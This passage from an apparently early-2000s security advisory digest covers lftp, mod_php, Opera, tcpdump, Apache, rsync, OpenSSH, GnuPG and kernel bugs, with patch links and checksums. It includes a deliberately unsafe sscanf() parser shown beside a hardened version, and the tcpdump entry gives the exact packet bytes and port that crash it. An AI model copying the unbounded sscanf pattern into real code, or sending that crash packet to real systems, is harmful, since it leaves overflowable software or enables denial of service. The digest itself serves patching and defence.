    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-282.src.rpm
      fe87f59c3e818fbb9eedcb211f9d0bf4
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-282.i386.rpm
      249a3cd1dcc1edaabf00d72874ba4aa2
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-282.nosrc.rpm
      7e5cbc3af87fdedbd8b6dc829e038d63
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-282.i386.rpm
      bd80346beef2e459009584065fccc7eb
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-282.src.rpm
      ce704a3481d8b84f9fdd0b83784e74a6


    Opteron x86_64 Platform:

    SuSE-9.0:
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-171.x86_64.rpm
      3dd54a4105bad6c4f3084e70aaa45410
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-171.src.rpm
      d88ca0142409a98a7e4e9f4f7b2e9bf8
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-171.x86_64.rpm
      b97e9d91ef710b0b801536294d99ba1a
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-171.src.rpm
      6221b0f5893499f5926c9dd529fceb5c
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-171.x86_64.rpm
      1a27668dff4ae3c405f18399432a326e
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-171.src.rpm
      301e1d8ac232d3a000f373a928deee5f




New lftp packages fix arbitrary code execution

2004-01-04

Risk level: high

Type: Buffer overflow

Source of info: Debian Security Team

Impact

A remotely exploitable bug in lftp can lead to the execution of arbitrary code.

Overview

Ulf Harnhammar discovered a buffer overflow in lftp, a set of
sophisticated command-line FTP/HTTP client programs.  An attacker
could create a carefully crafted directory on a website so that the
execution of an 'ls' or 'rels' command would lead to the execution of
arbitrary code on the client machine.

Patches

Links to the updated Debian packages:

Debian GNU/Linux 3.0 alias woody
--------------------------------
  Source archives:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2.dsc
      Size/MD5 checksum:      604 f5daa8b9ca0b4a3dd775ece1d5d90dbc
    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2.diff.gz
      Size/MD5 checksum:    23483 9f2005abc309b9e44c09e4518063f811
    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9.orig.tar.gz
      Size/MD5 checksum:  1479880 53ce980339e1adb0c4ec7135950d2055

  Alpha architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_alpha.deb
      Size/MD5 checksum:   506612 8c0580626371c756c0a0c62eeb5128f0

  ARM architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_arm.deb
      Size/MD5 checksum:   443624 8b2393f949aeca43699e27527d4e3179

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_i386.deb
      Size/MD5 checksum:   441070 96b40a457747a309b72e240bf88f1dcd

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_ia64.deb
      Size/MD5 checksum:   602626 bbc526e8b9212b5b1e80558958677299

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_hppa.deb
      Size/MD5 checksum:   499616 8ad2c1349fe16284b8f904d88177e9ee

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_m68k.deb
      Size/MD5 checksum:   423600 652c35b149e1ce3bb6602ed17430e1a2

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_mips.deb
      Size/MD5 checksum:   472524 7545ec21b6a423373538ecd941848e5a

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_mipsel.deb
      Size/MD5 checksum:   470934 3153069a5cd81582d270bb0341b30c08

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_powerpc.deb
      Size/MD5 checksum:   457702 4d58d1f70d75f8a8f173f5d966ced97a

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_s390.deb
      Size/MD5 checksum:   452260 149e1fbbc06fdad45b0cf64cb3d43350

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_sparc.deb
      Size/MD5 checksum:   445716 07b1e6b07e9a4a7f47bddebf82c5f372


  These files will probably be moved into the stable distribution on
  its next revision.



Hijacking Apache https by mod_php

2003-12-26

Risk level: medium

Type: Buffer overflow

Source of info: Steve Grub

Impact

Mod_php under Apache 2.0.x leaks a critical file descriptor that can be used to take over (hijack) the https service.

Overview

When using mod_php, many file descriptors are leaked to the php script process. If the script page calls external programs via passthru(), exec(), or system(), the descriptors are leaked to that program as well.

One of these descriptors is the listening descriptor to port 443, also known as https. Port 443 is a privileged port and can only be bound to by a root process. It is not normal for that descriptor to be leaked to any or all programs. As a side note, this descriptor seems to be opened by apache regardless of whether or not you use https.

The bug is caused by not calling fcntl() with the FD_CLOEXEC flag, which would prevent the leak of the privileged file descriptor across exec. (It really is a one-line fix!)

The listening descriptor is used by all sites on the same machine. If a person can ftp in an executable and has access to php, they may be able to hijack the https service for all sites on the machine. Sandboxing and jailing may not help, since the descriptor itself is leaked to the child.

"Safe_mode = on" does not offer any protection for this problem if safe_mode_exec_dir points to a directory that can be ftp'd to.



Arbitrary File Delete Vulnerability in Opera 7

2003-12-22

Risk level: Critical

Type: remote file deletion

Source of info: Operash

Impact

When displaying a download dialog, Opera creates a temporary file. The file
  name is not sanitized sufficiently, so an existing file can be deleted.

Overview

By exploiting this vulnerability, a remote attacker can delete
  an arbitrary existing file on the local disk.

  This vulnerability carries the following risks:

  * Destruction of the system.
  * Destruction of application data.

SYSTEMS AFFECTED
=====================

  7.22 build 3221 (JP:build 3222)
  7.21 build 3218 (JP:build 3219)
  7.20 build 3144 (JP:build 3145)
  7.1x
  7.0x


SYSTEMS NOT AFFECTED
=========================

  7.23 build 3227 (JP:build 3226)


EXAMINED
=============

  Opera for Windows:
    Opera 7.23 build 3227 (JP:build 3226)
    Opera 7.22 build 3221 (JP:build 3222)
    Opera 7.21 build 3218 (JP:build 3219)
    Opera 7.20 build 3144 (JP:build 3145)
    Opera 7.11 build 2887
    Opera 7.11 build 2880
    Opera 7.10 build 2840
    Opera 7.03 build 2670
    Opera 7.02 build 2668
    Opera 7.01 build 2651

  Platform:
    Windows 98SE Japanese
    Windows 2000 Professional SP4 Japanese
    Windows XP Professional SP1 Japanese


SOLUTION
========

  Upgrade to version 7.23 or later.

Patches

http://www.opera.com/



Repeatable tcpdump remote crash

2003-12-20

Risk level: Critical

Type: Buffer overflow

Source of info: Przemyslaw Frasunek

Impact

Sending a packet containing the bytes 0xff,0x02 to port 1701/udp causes the L2TP protocol parser in tcpdump to enter an infinite loop, eating all available memory and then segfaulting.

Overview

This bug also affects tcpdump in -CURRENT.
Fix: unknown; recent versions of tcpdump are immune to this problem.

Patches

Search for more information and patches at:
http://www.openbsd.org/query-pr.html
using PR number: 3610



Updated httpd packages fix Apache security vulnerabilities

2003-12-18

Risk level: high

Type: many types

Source of info: Red Hat Security Team

Impact

Updated httpd packages that fix two minor security issues in the Apache Web
server are now available for Red Hat Linux 8.0 and 9 (CAN-2003-0542, CAN-2003-0789), and for 7.1, 7.2, and 7.3 (CAN-2003-0542).

Overview

The Apache HTTP Server is a powerful, full-featured, efficient, and
freely-available Web server.

An issue in the handling of regular expressions from configuration files
was discovered in releases of the Apache HTTP Server version 2.0 prior to
2.0.48.  To exploit this issue an attacker would need to have the ability
to write to Apache configuration files such as .htaccess or httpd.conf.  A
carefully-crafted configuration file can cause an exploitable buffer
overflow and would allow the attacker to execute arbitrary code in the
context of the server (in default configurations as the 'apache' user).
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0542 to this issue.

A bug in the CGI daemon-based "mod_cgid" module was discovered that can
result in CGI script output being sent to the wrong client. This issue only
affects Red Hat Linux 9, and only when the server is configured to use the
"worker" MPM. The default configuration uses the "mod_cgi" module for CGI
and is not affected by this issue. The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2003-0789 to this issue.

Users of the Apache HTTP Server should upgrade to these erratum packages,
which contain backported patches correcting these issues, and are applied
to Apache version 2.0.40.

Patches

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/httpd-2.0.40-11.9.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/httpd-2.0.40-11.9.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/httpd-devel-2.0.40-11.9.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/httpd-manual-2.0.40-11.9.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/mod_ssl-2.0.40-11.9.i386.rpm

Red Hat Linux 9:

SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/httpd-2.0.40-21.9.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/httpd-2.0.40-21.9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/httpd-devel-2.0.40-21.9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/httpd-manual-2.0.40-21.9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/mod_ssl-2.0.40-21.9.i386.rpm

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/apache-1.3.27-3.7.1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/apache-1.3.27-3.7.1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/apache-devel-1.3.27-3.7.1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/apache-manual-1.3.27-3.7.1.i386.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/apache-1.3.27-3.7.2.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/apache-1.3.27-3.7.2.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/apache-devel-1.3.27-3.7.2.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/apache-manual-1.3.27-3.7.2.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/apache-1.3.27-3.7.2.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/apache-devel-1.3.27-3.7.2.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/apache-manual-1.3.27-3.7.2.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/apache-1.3.27-4.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/apache-1.3.27-4.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/apache-devel-1.3.27-4.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/apache-manual-1.3.27-4.i386.rpm








Buffer overflows in lftp

2003-12-15

Risk level: medium

Type: remote system compromise

Source of info: SuSE Security Team

Impact

The flexible and powerful FTP command-line client lftp is vulnerable to two remote buffer overflows.
When lftp is used via HTTP or HTTPS to execute commands like 'ls' or 'rels', specially prepared directories on the server can trigger a buffer overflow in the HTTP handling functions of lftp and possibly execute arbitrary code on the client side. Please note that to exploit these bugs an attacker has to control the server side of the connection, and the attacker will only gain access to the account of the user that is executing lftp.

Overview

Ulf Härnhammar, who posted this issue to Bugtraq, stated that technically the problem lies in the file src/HttpDir.cc and the functions try_netscape_proxy() and try_squid_eplf(), which both have sscanf() calls that take data of arbitrary length and store it in a char array with 32 elements. (Back in version 2.3.0 the problematic code was located in some other function, but the problem existed back then too.)
Depending on the HTML document in the specially prepared directory, buffers will be overflowed in either one function or the other.
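
The pattern described above, as an added illustration rather than lftp's own code: an unbounded sscanf() %s conversion into a 32-byte array beside a hardened version that bounds the field and rejects names that were silently truncated. The "name size" line format, the struct and the function names are assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* 32-element array, as in the lftp functions described above. */
#define NAME_LEN 32

struct listing_entry {
    char name[NAME_LEN];
    long size;
};

/* The vulnerable pattern: an unbounded %s conversion writes however many
 * non-space bytes the (server-controlled) line contains into a 32-byte
 * array. Shown for comparison only; this example never calls it. */
int parse_entry_unsafe(const char *line, struct listing_entry *e)
{
    return sscanf(line, "%s %ld", e->name, &e->size) == 2;
}

/* Hardened version. "%31s" (NAME_LEN - 1) caps the write at 31 bytes plus
 * the terminating NUL. "%n" records how far the name conversion reached, so
 * a name that was cut off can be detected and the line rejected instead of
 * being accepted with a mangled name and a wrong size. */
int parse_entry_safe(const char *line, struct listing_entry *e)
{
    int after_name = 0;

    if (sscanf(line, "%31s%n %ld", e->name, &after_name, &e->size) != 2)
        return 0;                       /* missing or malformed field */
    /* If the byte right after the consumed name is neither the end of the
     * string nor whitespace, the name was longer than 31 bytes and got cut. */
    if (line[after_name] != '\0' && !isspace((unsigned char)line[after_name]))
        return 0;
    return 1;
}

int main(void)
{
    struct listing_entry e;
    const char *normal = "index.html 2048";
    /* Constructed over-long line: 40 'A's followed by a size field. */
    char overlong[64];

    memset(overlong, 'A', 40);
    memcpy(overlong + 40, " 99", 4);
    printf("%-10s -> %d\n", "normal", parse_entry_safe(normal, &e));
    printf("%-10s -> %d\n", "overlong", parse_entry_safe(overlong, &e));
    return 0;
}
```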


Patches

Src (vendor page):
http://lftp.yar.ru/

SuSE updates:
Intel i386 Platform:
    SuSE-9.0:
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/lftp-2.6.6-71.i586.rpm
      2e5aee46868b5b19c26a8559927e8663
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/lftp-2.6.6-71.i586.patch.rpm
      0468cf8f2b2b4c18a854f51ef63470b7
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/lftp-2.6.6-71.src.rpm
      a32eee3ff4eeb322d44f04b9f8ff4c9c

    SuSE-8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/lftp-2.6.4-44.i586.rpm
      df0d7c059cd3bb4fe47c927849fd9a5e
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/lftp-2.6.4-44.i586.patch.rpm
      eb9d6aedc25d3e2d25b63999526ee1bd
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/lftp-2.6.4-44.src.rpm
      63695b02bf520b02f93ec73078d6e4d8





Bugs in cvs

2003-12-11

Risk level: minimal

Type: many types

Source of info: GENTOO LINUX SECURITY TEAM

Impact

Stable CVS 1.11.10 has been released. Stable releases contain only bug fixes from previous versions of CVS. This release fixes a security issue with no known exploits that could cause previous versions of CVS to attempt to create files and directories in the filesystem root. This release also fixes several issues relevant to case-insensitive filesystems and some other bugs. We recommend this upgrade for all CVS clients and servers.

Overview

More information can be found here:
<http://ccvs.cvshome.org/servlets/NewsItemView?newsID=84>

Patches

http://ccvs.cvshome.org/



SGI Advanced Linux Environment security update #6

2003-12-10

Risk level: medium

Type: many types

Source of info: SGI Security Team

Impact

SGI has released Patch 10037: SGI Advanced Linux Environment security update #6, which includes updated RPMs for SGI ProPack v2.3 for the Altix family of systems.

Overview

The update has been released in response to the following erratum released by Red Hat:
New rsync packages fix remote security vulnerability
 http://rhn.redhat.com/errata/RHSA-2003-399.html

Patches

Patch 10037 is available from http://support.sgi.com/ and
ftp://patches.sgi.com/support/free/security/patches/ProPack/2.3/

The individual RPMs from Patch 10037 are available from:
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/SRPMS



Remotely exploitable heap overflow in rsync

2003-12-05

Risk level: high

Type: heap overflow

Source of info: rsync team

Impact

The rsync team has received evidence that a vulnerability in rsync was recently used in combination with a Linux kernel vulnerability to
compromise the security of a public rsync server.

Overview

The rsync team's conclusions are that:
- rsync version 2.5.6 contains a heap overflow vulnerability that can be used to remotely run arbitrary code.
- While this heap overflow vulnerability could not be used by itself to obtain root access on an rsync server, it could be used in combination with the recently announced brk vulnerability in the Linux kernel to produce a full remote compromise.
- The server that was compromised was using the non-default rsyncd.conf option "use chroot = no". The use of this option made the attack on the compromised server considerably easier. A successful attack is almost certainly still possible without this option, but it would be much more difficult.

Please note that this vulnerability only affects the use of rsync as an "rsync server". To see whether you are running an rsync server, use the netstat command to check whether you are listening on TCP port 873. If you are not listening on TCP port 873, you are not running an rsync server.

Patches

The patches and full source for rsync version 2.5.7 are available from http://rsync.samba.org/ and mirror sites.



Multiple OpenSSH/OpenSSL Vulnerabilities Update on Irix

2003-12-03

Risk level: medium

Type: many types

Source of info: SGI Security Team

Impact

This is an update to SGI Security Advisory 20030904-01-P.

The original OpenSSH and OpenSSL packages did not have incremented
version numbers, so it was difficult to determine if a system was
vulnerable or fixed after the packages were installed. (SGI BUG 901671)

IRIX 6.5.20 and above include Kerberos. IRIX 6.5.19 does not have Kerberos,
so there was a conflict with the OpenSSL package. Patches are being
released to address this problem on IRIX 6.5.19. (SGI BUG 901706)

There was an additional OpenSSL ASN.1 vulnerability reported by:
http://www.uniras.gov.uk/vuls/2003/006489/openssl2.htm
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0851
which has been fixed by these updated patches. (SGI BUG 904644)

Overview

It has been reported that OpenSSH/OpenSSL that ships with IRIX has several
security vulnerabilities that may lead to root access on vulnerable systems.

1) buffer.c vulnerability fixed in OpenSSH 3.7 (CAN-2003-0693)
2) More buffer management vulnerabilities fixed in OpenSSH 3.7.1 (CAN-2003-0695)
3) Openwall's "memory" security fixes to OpenSSH 3.7.1 (CAN-2003-0682)
4) ssh-keysign core dumps on IRIX (SGI BUG 899663)
5) Multiple OpenSSL vulnerabilities in ASN.1 parsing

Please note that the OpenSSH which ships with IRIX is NOT vulnerable
to the two recent PAM vulnerabilities found in portable OpenSSH 3.7/3.7.1:
    http://www.openssh.com/txt/sshpam.adv

    * However, the Freeware OpenSSH from http://freeware.sgi.com/
    is PAM enabled and possibly vulnerable to these issues.

SGI has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable SGI systems.

These vulnerabilities have been corrected in future releases of IRIX.

SGI has provided a series of patches for these vulnerabilities. Our
recommendation is to upgrade to IRIX 6.5.22, or install the appropriate
patches.

SGI Freeware team has also provided an updated OpenSSH 3.7.1p2 package.
Freeware is not supported by SGI.


OS Version      Vulnerable?   Patch #   Actions
-----------     -----------   -------   -----------

IRIX 6.5.19m    yes           5362      Notes 1 & 2
IRIX 6.5.19f    yes           5362      Notes 1 & 2
IRIX 6.5.20m    yes           5405      Notes 1 & 2
IRIX 6.5.20f    yes           5405      Notes 1 & 2
IRIX 6.5.21m    yes           5363      Notes 1 & 2
IRIX 6.5.21f    yes           5363      Notes 1 & 2
IRIX 6.5.22     no                      Notes 1 & 2

    NOTES
     1) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact
        your SGI Support Provider or visit URL: http://support.sgi.com/

     2) Install the required patch(es) based on your operating release.

Patches

http://freeware.sgi.com/Dist/fw_openssh-3.7.1p2.tardist
http://support.sgi.com/



Gentoo's rsync rotation server (rsync.gentoo.org) compromised

2003-12-03

Risk level: low

Type: none

Source of info: GENTOO LINUX SECURITY TEAM

Impact

On December 2nd at approximately 03:45 UTC, one of the servers that make up the rsync.gentoo.org rotation was compromised via a remote exploit. At this point, the Gentoo Linux Security Team is still performing forensic analysis. However, the compromised system had both an IDS and a file integrity checker installed, and there is a very detailed forensic trail of what happened once the box was breached.
The GLS Team is reasonably confident that the portage tree stored on that box was unaffected.

Overview

The attacker appears to have installed a rootkit and modified/deleted some files to cover their tracks, but left the server otherwise untouched. The box was in a compromised state for approximately one hour before it was discovered and shut down. During this time, approximately 20 users synchronized against the portage mirror stored on this box. The method used to gain access to the box remotely is still under investigation.

This box is not an official Gentoo infrastructure box; it is donated by a sponsor. The box provides other services as well, and the sponsor has requested that the box not be publicly identified at this time.



Multiple bugs in GnuPG

2003-12-03

Risk level: medium

Type: cryptographic compromise

Source of info: SuSE Security Team

Impact

The gnupg package (the SUSE package is named gpg) is the most widely used software for cryptographic encryption/decryption of data.

Two independent errors have been found in gpg (GnuPG) packages:
 A) A format string error in the client code that does key retrieval from a (public) key server.
 B) A cryptographic error in gpg that results in a compromise of a cryptographic keypair if ElGamal signing keys have been used when generating the key.

Overview

 A)
    There exists a format string error in the client code for key retrieval from a keyserver. gpg-1.2.x version packages are affected by this vulnerability.
    The format string error can be used by an attacker performing a man-in-the-middle attack between you and your keyserver, or by a compromised keyserver. The result is a crash of gpg or potential execution of arbitrary code provided by the attacker, if the keyserver is used for key retrieval at the time of the attack.

 B)
    Werner Koch, the author of the gpg package, has publicly announced a weakness in gpg that was reported to him by Phong Nguyen:
    ElGamal signing keys can be attacked within seconds to reveal the private key of the keypair. It is strongly advised that ElGamal signing keys be revoked immediately. Only ElGamal keys are affected; other types are not vulnerable.

    To find out if you are using an ElGamal signing key, list your public keys using the command
         gpg --list-keys your_keyid
    Example:
    $ gpg --list-keys build@suse.de
    pub  1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de>
    sub  2048g/8495160C 2000-10-19 [expires: 2006-02-12]
    
    If your key lists a capital "G" after the key's length (like in
    pub  1536G/...), then your key is vulnerable. A small letter "g" after
    the key length does NOT indicate any problem.
    ElGamal keys can be used for primary keys as well as for subkeys. In the
    case where only a subkey is an ElGamal key, it is sufficient to revoke
    this specific subkey.

    To revoke a key, generate a revocation certificate using the following 
    command:

         gpg --gen-revoke your_keyid > revocation_certificate.pgp

    Then, the revocation certificate must be imported into your keyring:

         gpg --import < revocation_certificate.pgp

    As your last action, send the key with its revocation certificate
    to the keyservers that know your key:

         gpg --keyserver wwwkeys.eu.pgp.net --send-keys your_keyid


    ElGamal keys can only be generated by gpg if a special option (--expert)
    has been used to reveal "expert" options, and if a warning has been
    ignored after your choice to use ElGamal keys. Such keys are rare
    (Werner Koch reports 848 primary ElGamal signing keys and 324 vulnerable
    subkeys on the keyservers). Therefore, we expect that only experienced
    users of gpg may be vulnerable to the ElGamal signing key error.
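
    The capital "G" check described above, as an added example rather than anything from the SuSE advisory or GnuPG itself: a small parser for `gpg --list-keys` output that reports ElGamal signing keys and subkeys by key ID and prints the matching --gen-revoke command. The sample listing is constructed; its first two lines are the advisory's own example, and the second key and its IDs are placeholders.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define KEYID_LEN 17   /* room for a 16-hex-digit long key ID plus NUL */

/* Inspect one line of `gpg --list-keys` output. Returns 1 and copies the key
 * ID into keyid when the line is a "pub" or "sub" line whose algorithm letter
 * after the key length is a capital 'G' (ElGamal sign+encrypt). Lines with
 * 'D' (DSA), 'R' (RSA) or lower-case 'g' (ElGamal encrypt-only) return 0. */
int is_elgamal_signing_line(const char *line, char *keyid, size_t keyid_size)
{
    const char *p;
    size_t n = 0;

    if (strncmp(line, "pub", 3) != 0 && strncmp(line, "sub", 3) != 0)
        return 0;
    p = line + 3;
    if (!isspace((unsigned char)*p))
        return 0;
    while (isspace((unsigned char)*p))
        p++;
    if (!isdigit((unsigned char)*p))        /* key length, e.g. 1024 */
        return 0;
    while (isdigit((unsigned char)*p))
        p++;
    if (*p != 'G' || p[1] != '/')           /* "1536G/" is the vulnerable form */
        return 0;
    p += 2;
    while (isxdigit((unsigned char)p[n]))
        n++;
    if (n == 0 || n + 1 > keyid_size)
        return 0;
    memcpy(keyid, p, n);
    keyid[n] = '\0';
    return 1;
}

/* Scan a complete listing, storing up to max key IDs in ids. Returns the
 * number of ElGamal signing keys/subkeys found (at most max). */
int find_elgamal_signing_keys(const char *listing, char ids[][KEYID_LEN], int max)
{
    int found = 0;
    const char *line = listing;

    while (*line != '\0' && found < max) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[256];

        if (len >= sizeof buf)
            len = sizeof buf - 1;       /* overlong line: truncate, never overflow */
        memcpy(buf, line, len);
        buf[len] = '\0';
        if (is_elgamal_signing_line(buf, ids[found], KEYID_LEN))
            found++;
        if (nl == NULL)
            break;
        line = nl + 1;
    }
    return found;
}

/* Constructed sample: the first two lines are the advisory's own example
 * (DSA primary key, encrypt-only ElGamal subkey: not vulnerable); the
 * remaining lines are an invented key whose primary key and subkey are both
 * ElGamal signing keys. The key IDs are placeholders, not real keys. */
static const char SAMPLE_LISTING[] =
    "pub  1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de>\n"
    "sub  2048g/8495160C 2000-10-19 [expires: 2006-02-12]\n"
    "\n"
    "pub  1536G/0123ABCD 2003-01-01 Constructed Example <example@example.invalid>\n"
    "sub  1024G/89ABCDEF 2003-01-01\n";

int main(void)
{
    char ids[16][KEYID_LEN];
    int i, n = find_elgamal_signing_keys(SAMPLE_LISTING, ids, 16);

    for (i = 0; i < n; i++)
        printf("ElGamal signing key %s: revoke with\n"
               "    gpg --gen-revoke %s > revocation_certificate.pgp\n",
               ids[i], ids[i]);
    if (n == 0)
        puts("no ElGamal signing keys found");
    return 0;
}
```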

    

 UPDATES:

    The nature of the ElGamal error implies that a possible compromise was 
    made possible with the generation of the key in the past already. There is
    no way that an update package can prevent the compromise. However,
    the update packages that we provide prevent the use of ElGamal signing
    keys for key generation once the packages are installed. 

    SUSE Linux 8.1 and before contain a gpg package of version 1.0.x 
    (vulnerable to the ElGamal signing key bug only), a version of 1.2.x
    has been shipped with SUSE Linux 8.2 and 9.0 (vulnerable to both errors).
    We provide update packages that fix both vulnerabilities, meaning that
    only the packages affected by both vulnerabilities are being updated.
    For this reason, there are only update packages for SuSE Linux 8.2
    and SUSE LINUX 9.0 available for download.

    Important Note:
    A proper installation of the gpg update package is critical for future
    updates on your system. The gpg program is being used by YaST Online
    Update (YOU) to verify the authenticity of your update package. A failure
    of a signature verification will result in a failure of the installation
    of update packages.

Patches

Intel i386 Platform:
    SuSE-9.0:
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/gpg-1.2.2-121.i586.rpm
      3f3513f61408128b5a95bd251540200f
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/gpg-1.2.2-121.i586.patch.rpm
      227002b89a49cf3581fb1fb4c185e725
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/gpg-1.2.2-121.src.rpm
      d3bb8845401d5e707a5da830ab209993
    SuSE-8.2:
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/gpg-1.2.2rc1-98.i586.rpm
      ff54dbcb36cf741f108bdd48d5496e5d
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/gpg-1.2.2rc1-98.i586.patch.rpm
      0efef8f33670349639fa5c25b3c5f3a3
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/gpg-1.2.2rc1-98.src.rpm
      13ee0ff9bb2137365ab91f32324a4114

Opteron x86_64 Platform:
    SuSE-9.0:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/gpg-1.2.2-117.x86_64.rpm
      a1679f36e00347a1adf53e2209245274
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/gpg-1.2.2-117.x86_64.patch.rpm
      f3002d4cea60bb0acea1e8bea89d46c9
    source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/gpg-1.2.2-117.src.rpm
      50e58f6853dcd5523172cb4c07a63d89



Bugs in linux kernels

2003-12-01

Risk level: high

Type: Buffer overflow

Source of info: Debian Security Team

Impact

Recently multiple servers of the Debian project were compromised using a
Debian developer's account and an unknown root exploit. Forensics
revealed a burneye encrypted exploit. Robert van der Meulen managed to
decrypt the binary which revealed a kernel exploit. Study of the exploit
by the RedHat and SuSE kernel and security teams quickly revealed that
the exploit used an integer overflow in the brk system call. Using
this bug it is possible for a userland program to trick the kernel into
giving access to the full kernel address space. This problem was found
in September by Andrew Morton, but unfortunately that was too late for
the 2.4.22 kernel release.

Overview

This bug has been fixed in kernel version 2.4.23 for the 2.4 tree and
2.6.0-test6 kernel tree. For Debian it has been fixed in version
2.4.18-12 of the kernel source packages, version 2.4.18-14 of the i386
kernel images and version 2.4.18-11 of the alpha kernel images.

Patches

Debian 3.0 (stable)
  Source archives:
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-12.tar.gz
      Size/MD5 checksum:    69746 a4b642e03732748d6820524746ba2265
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18.orig.tar.gz
      Size/MD5 checksum: 29818323 24b4c45a04a23eb4ce465eb326a6ddf2
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-11.dsc
